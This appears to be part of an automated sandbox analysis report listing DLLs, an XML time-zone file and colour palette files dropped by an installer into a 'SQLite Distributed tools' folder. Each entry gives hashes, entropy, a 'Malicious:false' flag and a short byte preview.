                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...G..V...........#.........n......0........0....|n................................=F........ .........................u.......l...................................................................................t................................text...4...........................`.P`.data....&...0...(..................@.`..rdata.......`.......>..............@.`@.bss..................................`..edata..u............V..............@.0@.idata..l............^..............@.0..CRT....,............f..............@.0..tls.... ............h..............@.0..reloc...............j..............@.0B........................................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\libgpg-error-0.dll (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):57856
                                                                  Entropy (8bit):6.295204788467111
                                                                  Encrypted:false
                                                                  SSDEEP:1536:Wztan7pk13bHPH/VDMzp4wpmKBVzOf1JJKDo7wvNyGUC:st29kHVoCwpZBpOf1JJKDo7wvNyJ
                                                                  MD5:40F2B954259FF75979920FA7546C89F0
                                                                  SHA1:C93F6BC6C7F68DD02DCF66C57A71FCF8DDBC35E5
                                                                  SHA-256:460960B7A0A0F5F0A40B33203A46E840AD01E260AFB4540ECD4E6C779D5B041B
                                                                  SHA-512:D992DDD9271422914335DE85F0CB6991F4389F7E2C9A8B4606C435DC30CEEE31671D725EFA4DA397502551D1B45F826692D486612AFE435A51D30B13DACD295D
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...G..V...........#................0.............(k.........................`................ .........................>.......t....@..l....................P..d............................0......................`................................text...(...........................`.P`.data...H...........................@.0..rdata...2.......4..................@.`@.bss..................................`..edata..>...........................@.0@.idata..t...........................@.0..CRT....,.... ......................@.0..tls.... ....0......................@.0..rsrc...l....@......................@.0..reloc..d....P......................@.0B................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\libgstapp-1.0-0.dll (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):71680
                                                                  Entropy (8bit):6.249755448787507
                                                                  Encrypted:false
                                                                  SSDEEP:768:5ONkZWr2iwGZYSK8wHieEbRuzwoQs4HwU4XJPcCqqTPtzY0Xcd6e2XGem3SObDQy:5ONkZqhGHi1uzZGHwlOSs/2fmiOQ
                                                                  MD5:613283CE438722CC027B2F0CAFC910D7
                                                                  SHA1:06D1F1B97A1041A58D55D6EE227DF887511041A5
                                                                  SHA-256:D953E18D73AF16D5B0E2EBC79CBB6F85871DD5CD4EBD45A5B1D54F50AABAAD3E
                                                                  SHA-512:44897BBBA77779A0DCAAABB8B91FC6338320B86A88B10132A1841D35D1605118FC7FFE66B1BEA18813E40B0EE5BFB8942B831C5E52DFB767A2572C204A071112
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...G..V...........#................0.............<p................................1......... ...................... .......0..@............................p..d............................`......................<3...............................text...............................`.P`.data...............................@.`..rdata...$.......&..................@.`@.bss..................................`..edata....... ......................@.0@.idata..@....0......................@.0..CRT....,....P......................@.0..tls.... ....`......................@.0..reloc..d....p......................@.0B........................................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\libgstcontroller-1.0-0.dll (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):84992
                                                                  Entropy (8bit):6.265898506164664
                                                                  Encrypted:false
                                                                  SSDEEP:1536:HEbGfT4u4bdi3txtGwY4HmUo5B8NC5Uw4tmfee2K0nXqJUDdsXNSSG3H00StLebU:k6fTTkdi3AwmUo78/tIeeOnXq2sX8SGq
                                                                  MD5:6BA630B7EFB75E1A7BD1DDE921269CAF
                                                                  SHA1:747A70F6AA881371987D17C777A8AC2F9ACD97DF
                                                                  SHA-256:469082F964FEDD6014CF97DE7C30F85D471E6C41248A48A8870657E330D7E36C
                                                                  SHA-512:F401ADB86F6CB3BDEBFF0C6310A2AE7C0B2E59BDFB9EC3C8008A941AE22DEA3EE4D39ECB6D7C7331A8DEDC96E03A8C1C70AC14DCA5C183D509F253755FDFA376
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...G..V...........#.........H......0..............e......................................... ......................`..k....p.......................................................................................r..@............................text...T...........................`.P`.data...D...........................@.0..rdata...'... ...(..................@.`@.bss.........P........................`..edata..k....`......."..............@.0@.idata.......p.......(..............@.0..CRT....,............<..............@.0..tls.... ............>..............@.0..reloc...............@..............@.0B........................................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\libgstfft-1.0-0.dll (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):67584
                                                                  Entropy (8bit):6.383793162041836
                                                                  Encrypted:false
                                                                  SSDEEP:1536:rfPpv2oNi2l7RyqgAVn21UH+KUf7jDq6LmG1h85:rfPpv2oYmGAVu5K4T7LRH8
                                                                  MD5:29F7AAB4E7367014DB45F866AB052327
                                                                  SHA1:F2BC284D7ACBEF09FEA7136B9156ED79289059F7
                                                                  SHA-256:2204684F02AE5185DEAA3704ED8355A737018CAE320E68E3209311D1F2506237
                                                                  SHA-512:46917B7C58E46DCAAA7F9740BC65C7323FE4A999CE35D3C670C7B8DCB205BE2667A7A5D21DFEE8F32F42A1EE41F6118DF896D02A96AD85A0B0F88C3B79B87143
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...G..V...........#................0..............j.................................3........ ......................0.......@...............................p...............................`......................XA...............................text...............................`.P`.data...D...........................@.0..rdata..............................@.`@.bss......... ........................`..edata.......0......................@.0@.idata.......@......................@.0..CRT....,....P......................@.0..tls.... ....`......................@.0..reloc.......p......................@.0B........................................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\libgstriff-1.0-0.dll (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):86528
                                                                  Entropy (8bit):6.300346716213912
                                                                  Encrypted:false
                                                                  SSDEEP:1536:7JXErVqLiEb/Zp/Yz6V3JNmODTYaxIHsVn9HIjUmY5e2oC2K9lZ:7JXEBqLiCHAz6V9V9GURe2oC2KTZ
                                                                  MD5:893C149773BFF81B55530820207C73F0
                                                                  SHA1:46C6B5F00B463D31140A0B9972D4BC2B04BA0D0A
                                                                  SHA-256:83F074DBACF3D3DC4C7D5646D056359BB7CB29DCD1A2D109CD07EE21DBDB42AF
                                                                  SHA-512:33F1F08051632756396EE906BCB7285726484EBA1D8C67ECF884A42F824261D9B73BA0BCA52EB8A7D68E7544D79C6FEEA2C98A46C1E0E2CE98E3BBDC3B6B63EA
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...H..V...........#.........N......0............. i.......................................... ......................p..S.......0...................................................................................l................................text...............................`.P`.data...T...........................@.0..rdata...3... ...4..................@.`@.bss.........`........................`..edata..S....p.......,..............@.0@.idata..0............0..............@.0..CRT....,............@..............@.0..tls.... ............B..............@.0..reloc...............D..............@.0B........................................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\libgstsdp-1.0-0.dll (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):78848
                                                                  Entropy (8bit):6.246337898053042
                                                                  Encrypted:false
                                                                  SSDEEP:1536:1ISc1+2KuvhLeGwUNHsdvisJy2bmN0+RveV6yG:1e1+so5d6AbB+EV2
                                                                  MD5:8B89A31D5D3F3173F5E3BB9118D04A7E
                                                                  SHA1:B9829C7DF23D7190928041753E2E07069C7ABFEE
                                                                  SHA-256:C5616071D5D2E858BF26CEA64BCDA17B6C494B1507EA96A17816811C6071E4A8
                                                                  SHA-512:67ED465D0AF1E933DEE09C95A3E5945CB33308F0DE21182128F9D19C5AE85ED048B5CEF685B322A6BA4C33830F5844A5EED507B3475017A845391305D872FF12
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...H..V...........#.........0......0..............f.................................?........ ......................0..h....P..................................<............................p......................HR...............................text...d...........................`.P`.data...D...........................@.0..rdata..............................@.`@.bss......... ........................`..edata..h....0......................@.0@.idata.......P......................@.0..CRT....,....`.......&..............@.0..tls.... ....p.......(..............@.0..reloc..<............*..............@.0B........................................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\libics3.0.dll (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):1455616
                                                                  Entropy (8bit):7.042640553037248
                                                                  Encrypted:false
                                                                  SSDEEP:24576:pbPzGO1e6lBnWw1VEST8IKH3ql7nbz/jz/zz/Oz/qz/jz/8z/cL/ADDmPdde9OCr:pbtegtXSI0yRKzupMcRc/s+kobXnz/qZ
                                                                  MD5:F731523B0F49C63EAB8836BE4EEDB679
                                                                  SHA1:B09B495CF504552C95FA438219D1D42DE4748DF2
                                                                  SHA-256:742C9C82A8A67374B0D6CCF8E9DD16AC8A5D4D480667C1423454D3B58E853164
                                                                  SHA-512:5C5B3A75D11D7D49462E877B30F8C0D1C5BB5319D8426E7C913FDA28D7E2B837A22CC46C6FB4441AECC9F281B6ED0FABAF690AD24F60FCD8F44D6770359AAD0D
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$..........^..^..^......N............G.....{.....O.....H..W.k._..W.l.]..W.|.I..^..|.....R......_..^.x._....._..Rich^...En7..n..o7..nRich6..n................PE..L.....?a...........!......... ......F........0............................................@.........................PS..L....S.......... .......................t....1..8....................2.......1..@............0...............................text............................... ..`.rdata...?...0...@..................@..@.data...ln...p...J...V..............@....rsrc... ...........................@..@.reloc..t...........................@..B........................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\libid3tag.dll (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):87040
                                                                  Entropy (8bit):6.204875539391202
                                                                  Encrypted:false
                                                                  SSDEEP:1536:G3KDgzmAgyM0tlnOZO5WfQeN7VHS6WnjFFbm9B8JTKAFh2:Ga2SOtAZO5cQe5s6+rb2WzFh2
                                                                  MD5:4C85DFBA434A42BCD7E31D33E480DCE2
                                                                  SHA1:271B47765442FC9E50E0CDF46D0ADB8A854FD496
                                                                  SHA-256:8E96A33FC8635E1F12E14E3C9AAC6AD5EA21F7B70F0E9E423B487BB57EBBCE1E
                                                                  SHA-512:0E0BD76353D88B40FE77E81108A01EB61931B13FEC1846985FB0508702967FE4177D2A5C48E8C292EDF0F666813DC54B3757843A95846132D41964552E79E7EF
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...H..V...........#.........P......0..............q................................!......... ......................`.......p..................................X....................................................q..X............................text...............................`.P`.data...D...........................@.0..rdata...O.......P..................@.`@.bss.........P........................`..edata.......`.......*..............@.0@.idata.......p.......:..............@.0..CRT....,............D..............@.0..tls.... ............F..............@.0..reloc..X............H..............@.0B........................................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\libmetis1-0.dll (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):3227648
                                                                  Entropy (8bit):6.93247781094414
                                                                  Encrypted:false
                                                                  SSDEEP:49152:M05LMVXuj8VdABFDvGjXzGO5Goylo2+ffBCvfLtPSjs68InEbL9ZIQkpqte:M054VVrABFDywoylo2GfCkjs3b
                                                                  MD5:063E873E85BB44068B18FF6AD4A61696
                                                                  SHA1:297EED727AB1B15EDA4EFC0ED751D1E3AE14BDE0
                                                                  SHA-256:C67F7EB39A4A4929A1BEAA8DF258EBDD0FA7D200EE59817AA172E049AB8482C9
                                                                  SHA-512:DC5F855B61A2CBE3152048146FC1C8E6DF8B5DA21C827E5FB8235592232C2D6CD8C50A4271BB9EE1896E26C53C57CC7A7C4B78D65B5B0FE2740BC9955AD1FD93
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: MZ......................@...................................@...........!..L.!This program cannot be run in DOS mode....$........"#.CM..CM..CM..;..CM..6I..CM..6N..CM..6H..CM..6L..CM..6H..CM..6I..CM..(L..CM..%L..CM..CL..BM..*I..CM.[7H..CM..*I..CM..6H.;CM..6M..CM..6...CM..C..CM..6O..CM.Rich.CM.Rich.M(.................PE..L.....?a...........!......#..........G .......#...............................1......./...@...........................-.@...0.-..............................@0..{....,.p.....................,.......,.@.............#..............................text.....#.......#................. ..`.rdata..v.....#.......#.............@..@.data...(.....-.......-.............@....rsrc................<..............@..@.reloc...{...@0..|..../.............@..B........................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\libmms-0.dll (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):71168
                                                                  Entropy (8bit):6.40885208921363
                                                                  Encrypted:false
                                                                  SSDEEP:1536:zJYutTAkscOGfUsditx65XjxqzH6oPA4Ol/mGdiP99bQXFCw3:zJYAJss3d3zxfoIV/bCw3
                                                                  MD5:BC738DA6535B5015E9EABA90F56F8B59
                                                                  SHA1:CE7C7865645A09DCF59DAF519BADE328DDF04B67
                                                                  SHA-256:4EEA44B0B4EA4C248595BB1E573334005EC538792E3BB9D2A07EE01265443327
                                                                  SHA-512:FD2A5C1EB9C5FE4BD2FD87EF912297F463CB623E12D5E9CCF8CC7FCCB39858765E289F4A9102FC02F68B0845048ABB1390DD32AFE2329B143ED331F678C4792B
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...G..V...........#................0.............dd................................%......... ......................0..A....@...............................p..X............................`.......................A..p............................text...............................`.P`.data...d...........................@.`..rdata...-..........................@.`@.bss......... ........................`..edata..A....0......................@.0@.idata.......@......................@.0..CRT....,....P......................@.0..tls.... ....`......................@.0..reloc..X....p......................@.0B........................................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\liborc-test-0.4-0.dll (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):52224
                                                                  Entropy (8bit):6.245414002002033
                                                                  Encrypted:false
                                                                  SSDEEP:768:OsH/CHGrCasbXzxUuAEZ1rXK4bgCAosF14HYs44HZcCq+TEbbJwziIHc42+ewBmV:OsRvQras7jHYN1u+JwZmwdtmns
                                                                  MD5:00D68E20169F763376095705C1520C4F
                                                                  SHA1:75EC5E1974654613C9EEEFF047F1EB58694FD656
                                                                  SHA-256:3C12F0A9F43CF88D82F5CC482627237F51A63A293EF95F2342222EBDE1FB909F
                                                                  SHA-512:4E180A8CE0E30CFC82883D05D8708FE82442541A4C522055D00F381BF47A0A4F269BC1F5E1EBBFEC888EDBE455CE145E24CB4C734E682E830322E13479A62C34
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...H..V...........#................0..............i.........................@............... .................................`............................0............................... .......................................................text...$...........................`.P`.data...D...........................@.0..rdata..T...........................@.`@.bss..................................`..edata..............................@.0@.idata..`...........................@.0..CRT....,...........................@.0..tls.... .... ......................@.0..reloc.......0......................@.0B........................................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\libplist.dll (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):63488
                                                                  Entropy (8bit):6.300610257983227
                                                                  Encrypted:false
                                                                  SSDEEP:1536:Opi4OKRmDCqQPlwXVXKXHWRi6H7hubmKvp08k:OpLmDCqQWXVamRLMbpvp08k
                                                                  MD5:49055810FCC813A8E1BDE0A64233F06F
                                                                  SHA1:70F9B4F9668CEDE76B785DD3A1D54146B7F8F68A
                                                                  SHA-256:D1111915F3E27EF605141A56CC5BEDEA25684ED44784DE1213E99F5FE9E5A41E
                                                                  SHA-512:7FCA8D488BC30385011AEAC999943A7BC6BA9E2E15CE83D8CCB77AE72A7C0AF1391D6F7A8966443C31F83C54C10A67722D976E7D69F0D442234264C8856A5C50
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...H..V...........#................0.............Hj.........................`................ .........................:.... ...............................P...............................@.......................!..p............................text...............................`.P`.data...D...........................@.0..rdata..............................@.`@.bss..................................`..edata..:...........................@.0@.idata....... ......................@.0..CRT....,....0......................@.0..tls.... ....@......................@.0..reloc.......P......................@.0B........................................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\menu.xml (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):427087
                                                                  Entropy (8bit):6.987040625415913
                                                                  Encrypted:false
                                                                  SSDEEP:6144:vb0yWeeZZHns7Ewj5ls/K6BI/epcxZJB2j5t0UC9Pn14G:vb0yWeeZZHns7EosSBvZJBAtSPn19
                                                                  MD5:21F4B705517AB90E325BD5715910E2BB
                                                                  SHA1:03FA75A46210BDE15BB99C268257B18FDD9E5EE5
                                                                  SHA-256:9B1E3FCEDAB0F186E574E9BA4F1AC423B38739F89062C5C33A7E0AF74D6ABFE3
                                                                  SHA-512:8967A196C5F4B1E8A86BF5B67F3BE352D876738591B97924CC1FE130732399CC2C93EE066EDC142294CAB0536AF65B3CFBBF0EC899C666F051F8681BED49F827
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: .<?xml version="1.0" encoding="utf-8"?>..<TimeZoneInfo GeneratedAt="2021-02-08T18:52:30.7353284+05:30">.. <TimeZones>.. <Zone ID="Africa/Algiers">.. <TZI UtcOff="00:12:12" Format="Europe_Central" Rules="" Until="1891-03-15T00:01:00" />.. <TZI UtcOff="00:09:21" Format="Europe_Central" Rules="" Until="1911-03-11T00:00:00" />.. <TZI UtcOff="00:00:00" Format="Europe_Central" Rules="Algeria" Until="1940-02-25T02:00:00" />.. <TZI UtcOff="01:00:00" Format="Europe_Central" Rules="Algeria" Until="1946-10-07T00:00:00" />.. <TZI UtcOff="00:00:00" Format="Europe_Central" Rules="" Until="1956-01-29T00:00:00" />.. <TZI UtcOff="01:00:00" Format="Europe_Central" Rules="" Until="1963-04-14T00:00:00" />.. <TZI UtcOff="00:00:00" Format="Europe_Central" Rules="Algeria" Until="1977-10-21T00:00:00" />.. <TZI UtcOff="01:00:00" Format="Europe_Central" Rules="Algeria" Until="1979-10-26T00:00:00" />.. <TZI UtcOff="00:00:00" Format="Europe_Central" Rules="Algeri
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\Bears.tpal (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):11099
                                                                  Entropy (8bit):4.521039979356267
                                                                  Encrypted:false
                                                                  SSDEEP:48:c8YDwylbCBB7FxS8vHK+7GrkeyL2eJc6zgqkT3ruyS0OB:9YVuBT9v1SrsLJJc6zgnT3ruyBq
                                                                  MD5:1DC710129081EC71B533232C139DA1E6
                                                                  SHA1:E6D91A05D7E09F4BFBFD5B6E74CB913FC8237B12
                                                                  SHA-256:5A428D282087283879837AE7ACEEDF5440B543B0A1A1453C5F00B0B7819CC1BC
                                                                  SHA-512:9E20FD606C2F8DA629964E6E8900C79194247D3E3AF97273301C2054B34119C17D702C2692645EE353052D43C0E5ABF467B7006F4952A483225CD812D42B3BD7
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Bears" >. <Color colorName="#080808" alpha="255" />. <Color colorName="#442c2c" alpha="255" />. <Color colorName="#50080c" alpha="255" />. <Color colorName="#483838" alpha="255" />. <Color colorName="#685444" alpha="255" />. <Color colorName="#746050" alpha="255" />. <Color colorName="#54382c" alpha="255" />. <Color colorName="#8c6858" alpha="255" />. <Color colorName="#ac745c" alpha="255" />. <Color colorName="#442c38" alpha="255" />. <Color colorName="#584844" alpha="255" />. <Color colorName="#70544c" alpha="255" />. <Color colorName="#08081c" alpha="255" />. <Color colorName="#686054" alpha="255" />. <Color colorName="#807460" alpha="255" />. <Color colorName="#a48868" alpha="255" />. <Color colorName="#787474" alpha="255" />. <Color colorName="#88806c" alpha="255" />. <Color colorName="#cca070" alpha="255" />. <Color colorName="#dcb87c" alpha="255" />. <Color colorName="#68646c" alpha="255" />. <Color colorName
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\Bgold.tpal (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):11099
                                                                  Entropy (8bit):4.521546649991855
                                                                  Encrypted:false
                                                                  SSDEEP:48:c86999BBhkHr68lQ77I68dXX0VVVIubWdr96IBIBWLZvRvmPV+kQ1xdrpR:9tHr68lI8dXX0VVV/bWdr9Q+kQ1xd9R
                                                                  MD5:0355D5D6840EBE4B10C35302116F0775
                                                                  SHA1:6B16C065A7AAA7817C177A6D0559CDE4EE42563B
                                                                  SHA-256:519E38D7A61151E89EA53CF7B9C807DBB79CFAE68E90EA0182E176F2242593CB
                                                                  SHA-512:4702666B1648B089B0EC809A7A4503A1BFC4B8345C3C0D8DA561549C05664719F7FDD57B09AC2363C1BA0BCB14DA798D39E68885BB191264B09EE4EA254C909C
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Bgold" >. <Color colorName="#ecd814" alpha="255" />. <Color colorName="#ecd814" alpha="255" />. <Color colorName="#ecd814" alpha="255" />. <Color colorName="#ecd414" alpha="255" />. <Color colorName="#ecd414" alpha="255" />. <Color colorName="#ecd018" alpha="255" />. <Color colorName="#ecd018" alpha="255" />. <Color colorName="#e8cc18" alpha="255" />. <Color colorName="#e8cc18" alpha="255" />. <Color colorName="#e8cc18" alpha="255" />. <Color colorName="#e8c818" alpha="255" />. <Color colorName="#e8c818" alpha="255" />. <Color colorName="#e8c418" alpha="255" />. <Color colorName="#e8c418" alpha="255" />. <Color colorName="#e4c018" alpha="255" />. <Color colorName="#e4c01c" alpha="255" />. <Color colorName="#e4bc1c" alpha="255" />. <Color colorName="#e4bc1c" alpha="255" />. <Color colorName="#e4b81c" alpha="255" />. <Color colorName="#e4b81c" alpha="255" />. <Color colorName="#e4b81c" alpha="255" />. <Color colorName
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\Blues.tpal (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):11099
                                                                  Entropy (8bit):4.4630297261884495
                                                                  Encrypted:false
                                                                  SSDEEP:48:c8KYpiwnllJoOTcXE9REjvyyvcr1KnlKZ:9KYpdltkRjZ/lKZ
                                                                  MD5:4E921EE57C9BD403B003398CF48BD626
                                                                  SHA1:7FD6B75A53D5441F3EFA68BDD584376062CA4AD6
                                                                  SHA-256:F41D714E0FE850DA0FD4CE191189D052A81AF89D4BB00A3D2E8565EA74AAE371
                                                                  SHA-512:5C32355D3997F5E1B246DC46B658239512E29282E367828E5D62DB72ED6616EEA29A943253DBCB1486CB8A1849CFECBE3BA88209620A0A819A378AADD9C26B51
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Blues" >. <Color colorName="#000000" alpha="255" />. <Color colorName="#000000" alpha="255" />. <Color colorName="#000004" alpha="255" />. <Color colorName="#00000c" alpha="255" />. <Color colorName="#000010" alpha="255" />. <Color colorName="#000018" alpha="255" />. <Color colorName="#000020" alpha="255" />. <Color colorName="#000024" alpha="255" />. <Color colorName="#00002c" alpha="255" />. <Color colorName="#000030" alpha="255" />. <Color colorName="#000038" alpha="255" />. <Color colorName="#000040" alpha="255" />. <Color colorName="#000044" alpha="255" />. <Color colorName="#00004c" alpha="255" />. <Color colorName="#000050" alpha="255" />. <Color colorName="#000058" alpha="255" />. <Color colorName="#000060" alpha="255" />. <Color colorName="#000064" alpha="255" />. <Color colorName="#00006c" alpha="255" />. <Color colorName="#000074" alpha="255" />. <Color colorName="#000078" alpha="255" />. <Color colorName
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\Borders.tpal (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):11101
                                                                  Entropy (8bit):4.542203244391445
                                                                  Encrypted:false
                                                                  SSDEEP:48:c8w3ZxjRhlnXqyDdt3alSyqqJmU03jtv0LZEEd6b0Hs62OfEiXkWOisqXa:9sZxRXq6de1wt7EEIHs6rfExWOYXa
                                                                  MD5:1711FC04ABAD15A9A3FD30B10088EB53
                                                                  SHA1:53E11FD716CE8C00D16B8F3381FD7B240A0AF71B
                                                                  SHA-256:5502DA0B916AF88B80F385F2057E356C32194DA32D953B19BEF64BAC76388195
                                                                  SHA-512:E5D5F19CF7F4E4F94EEFEB17B5CA60093388FF6A80BE6843C8A5DDC144F7B00CA5D4EDE67352105FACCE25E30D179070BC4E582A9777C4E81E6B0E660A7C6F45
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Borders" >. <Color colorName="#cc34b4" alpha="255" />. <Color colorName="#cc34b4" alpha="255" />. <Color colorName="#cc34b8" alpha="255" />. <Color colorName="#cc30bc" alpha="255" />. <Color colorName="#c830c0" alpha="255" />. <Color colorName="#c82cc8" alpha="255" />. <Color colorName="#c82ccc" alpha="255" />. <Color colorName="#c428d0" alpha="255" />. <Color colorName="#c428d4" alpha="255" />. <Color colorName="#c424dc" alpha="255" />. <Color colorName="#c024e0" alpha="255" />. <Color colorName="#c020e4" alpha="255" />. <Color colorName="#c020e8" alpha="255" />. <Color colorName="#bc1cf0" alpha="255" />. <Color colorName="#bc1cf4" alpha="255" />. <Color colorName="#bc18f8" alpha="255" />. <Color colorName="#bc18fc" alpha="255" />. <Color colorName="#c01cf8" alpha="255" />. <Color colorName="#c020f8" alpha="255" />. <Color colorName="#c424f8" alpha="255" />. <Color colorName="#c428f4" alpha="255" />. <Color colorNa
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\BrownsAndYellows.tpal (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1050
                                                                  Entropy (8bit):4.692876636956054
                                                                  Encrypted:false
                                                                  SSDEEP:24:2d8fHqjKwI0U0yjKNdEqqI0CD3cqpIoqwIb3LPXVqv:c8vExHt7oM
                                                                  MD5:68A91F330C057C4B09024F8A61D76683
                                                                  SHA1:D9E9A9A61B750FE5CA7691E754452242154B7088
                                                                  SHA-256:BEA0E70D85CD0E9BCC4E6083B88A4062DA73751CE3DF765587940AAA379D1BFF
